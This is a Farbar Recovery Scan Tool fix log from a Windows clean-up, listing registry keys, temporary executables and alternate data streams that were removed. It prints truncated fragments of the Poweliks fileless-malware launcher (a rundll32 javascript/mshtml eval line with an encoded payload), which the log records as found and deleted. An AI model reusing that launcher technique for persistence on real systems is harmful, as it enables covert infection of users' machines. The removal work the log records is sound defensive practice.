Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 29-10-2014 01 Ran by PAKLINE at 2014-10-29 11:52:39 Run:1 Running from D:\Users\PAKLINE\Desktop Loaded Profile: PAKLINE (Available profiles: PAKLINE & JLKLINE) Boot Mode: Normal ============================================== Content of fixlist: ***************** HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-1016725920-775701923-2771934606-1000\...\Policies\Explorer: [DisallowCpl] 1 HKU\S-1-5-21-1016725920-775701923-2771934606-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect" Toolbar: HKCU - No Name - {71576546-354D-41C9-AAE8-31F2EC22BF0D} - No File C:\Users\PAKLINE\AppData\Local\Temp\ose00000.exe C:\Users\PAKLINE\AppData\Local\Temp\stuprt.exe CustomCLSID: HKU\S-1-5-21-1016725920-775701923-2771934606-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\PAKLINE\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay No File CustomCLSID: HKU\S-1-5-21-1016725920-775701923-2771934606-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? AlternateDataStreams: C:\ProgramData\TEMP:057D335E AlternateDataStreams: C:\ProgramData\TEMP:0D560A24 AlternateDataStreams: C:\ProgramData\TEMP:0F4A7B6A AlternateDataStreams: C:\ProgramData\TEMP:157A85BF AlternateDataStreams: C:\ProgramData\TEMP:1DD12619 AlternateDataStreams: C:\ProgramData\TEMP:2208DD60 AlternateDataStreams: C:\ProgramData\TEMP:25612F5D AlternateDataStreams: C:\ProgramData\TEMP:25FF8A61 AlternateDataStreams: C:\ProgramData\TEMP:2BD96194 AlternateDataStreams: C:\ProgramData\TEMP:30C74695 AlternateDataStreams: C:\ProgramData\TEMP:32ED5FDF AlternateDataStreams: C:\ProgramData\TEMP:4AC411FC AlternateDataStreams: C:\ProgramData\TEMP:4B1DA55E AlternateDataStreams: C:\ProgramData\TEMP:55E1F0F4 AlternateDataStreams: C:\ProgramData\TEMP:57A1F470 AlternateDataStreams: C:\ProgramData\TEMP:64649538 AlternateDataStreams: C:\ProgramData\TEMP:6D7D86E8 AlternateDataStreams: C:\ProgramData\TEMP:710BBE5E AlternateDataStreams: C:\ProgramData\TEMP:78C04239 AlternateDataStreams: C:\ProgramData\TEMP:80CC1319 AlternateDataStreams: C:\ProgramData\TEMP:8497EEBD AlternateDataStreams: C:\ProgramData\TEMP:89952728 AlternateDataStreams: C:\ProgramData\TEMP:8EBDAD11 AlternateDataStreams: C:\ProgramData\TEMP:96B8AB27 AlternateDataStreams: C:\ProgramData\TEMP:98A8ABBD AlternateDataStreams: C:\ProgramData\TEMP:A1D41B64 AlternateDataStreams: C:\ProgramData\TEMP:A228E61B AlternateDataStreams: C:\ProgramData\TEMP:B351F9B6 AlternateDataStreams: C:\ProgramData\TEMP:B5F4E210 AlternateDataStreams: C:\ProgramData\TEMP:B7B09D45 AlternateDataStreams: C:\ProgramData\TEMP:C5AB6B6C AlternateDataStreams: C:\ProgramData\TEMP:C639099E AlternateDataStreams: C:\ProgramData\TEMP:D7AC6688 AlternateDataStreams: C:\ProgramData\TEMP:E64837BC AlternateDataStreams: C:\ProgramData\TEMP:F3B5A9E2 AlternateDataStreams: C:\ProgramData\TEMP:F54781BF AlternateDataStreams: C:\ProgramData\TEMP:F614E9D7 AlternateDataStreams: C:\ProgramData\TEMP:F6F0620D AlternateDataStreams: C:\ProgramData\TEMP:FFDA30C6 ***************** HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully. HKU\S-1-5-21-1016725920-775701923-2771934606-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisallowCpl => value deleted successfully. "HKU\S-1-5-21-1016725920-775701923-2771934606-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully. "HKU\S-1-5-21-1016725920-775701923-2771934606-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully. HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir => value deleted successfully. HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{71576546-354D-41C9-AAE8-31F2EC22BF0D} => value deleted successfully. "HKCR\CLSID\{71576546-354D-41C9-AAE8-31F2EC22BF0D}" => Key deleted successfully. C:\Users\PAKLINE\AppData\Local\Temp\ose00000.exe => Moved successfully. C:\Users\PAKLINE\AppData\Local\Temp\stuprt.exe => Moved successfully. "HKU\S-1-5-21-1016725920-775701923-2771934606-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}" => Key deleted successfully. "HKU\S-1-5-21-1016725920-775701923-2771934606-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found. C:\ProgramData\TEMP => ":057D335E" ADS removed successfully. C:\ProgramData\TEMP => ":0D560A24" ADS removed successfully. C:\ProgramData\TEMP => ":0F4A7B6A" ADS removed successfully. C:\ProgramData\TEMP => ":157A85BF" ADS removed successfully. C:\ProgramData\TEMP => ":1DD12619" ADS removed successfully. C:\ProgramData\TEMP => ":2208DD60" ADS removed successfully. C:\ProgramData\TEMP => ":25612F5D" ADS removed successfully. C:\ProgramData\TEMP => ":25FF8A61" ADS removed successfully. C:\ProgramData\TEMP => ":2BD96194" ADS removed successfully. C:\ProgramData\TEMP => ":30C74695" ADS removed successfully. C:\ProgramData\TEMP => ":32ED5FDF" ADS removed successfully. C:\ProgramData\TEMP => ":4AC411FC" ADS removed successfully. C:\ProgramData\TEMP => ":4B1DA55E" ADS removed successfully. C:\ProgramData\TEMP => ":55E1F0F4" ADS removed successfully. C:\ProgramData\TEMP => ":57A1F470" ADS removed successfully. C:\ProgramData\TEMP => ":64649538" ADS removed successfully. C:\ProgramData\TEMP => ":6D7D86E8" ADS removed successfully. C:\ProgramData\TEMP => ":710BBE5E" ADS removed successfully. C:\ProgramData\TEMP => ":78C04239" ADS removed successfully. C:\ProgramData\TEMP => ":80CC1319" ADS removed successfully. C:\ProgramData\TEMP => ":8497EEBD" ADS removed successfully. C:\ProgramData\TEMP => ":89952728" ADS removed successfully. C:\ProgramData\TEMP => ":8EBDAD11" ADS removed successfully. C:\ProgramData\TEMP => ":96B8AB27" ADS removed successfully. C:\ProgramData\TEMP => ":98A8ABBD" ADS removed successfully. C:\ProgramData\TEMP => ":A1D41B64" ADS removed successfully. C:\ProgramData\TEMP => ":A228E61B" ADS removed successfully. C:\ProgramData\TEMP => ":B351F9B6" ADS removed successfully. C:\ProgramData\TEMP => ":B5F4E210" ADS removed successfully. C:\ProgramData\TEMP => ":B7B09D45" ADS removed successfully. C:\ProgramData\TEMP => ":C5AB6B6C" ADS removed successfully. C:\ProgramData\TEMP => ":C639099E" ADS removed successfully. C:\ProgramData\TEMP => ":D7AC6688" ADS removed successfully. C:\ProgramData\TEMP => ":E64837BC" ADS removed successfully. C:\ProgramData\TEMP => ":F3B5A9E2" ADS removed successfully. C:\ProgramData\TEMP => ":F54781BF" ADS removed successfully. C:\ProgramData\TEMP => ":F614E9D7" ADS removed successfully. C:\ProgramData\TEMP => ":F6F0620D" ADS removed successfully. C:\ProgramData\TEMP => ":FFDA30C6" ADS removed successfully. ==== End of Fixlog ====